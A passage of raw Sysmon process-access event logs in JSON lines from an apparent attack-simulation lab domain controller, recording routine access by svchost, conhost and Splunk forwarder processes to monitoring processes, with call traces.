C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.535\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-114C-5F25-0000-0010601B0600}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.535","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-114C-5F25-0000-0010601B0600}","TargetProcessId":"3056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4374,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:00.676\r\nSourceProcessGUID: {E2A3D6B1-114C-5F25-0000-0010601B0600}\r\nSourceProcessId: 3056\r\nSourceThreadId: 3040\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:00.676","SourceProcessGUID":"{E2A3D6B1-114C-5F25-0000-0010601B0600}","SourceProcessId":"3056","SourceThreadId":"3040","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program 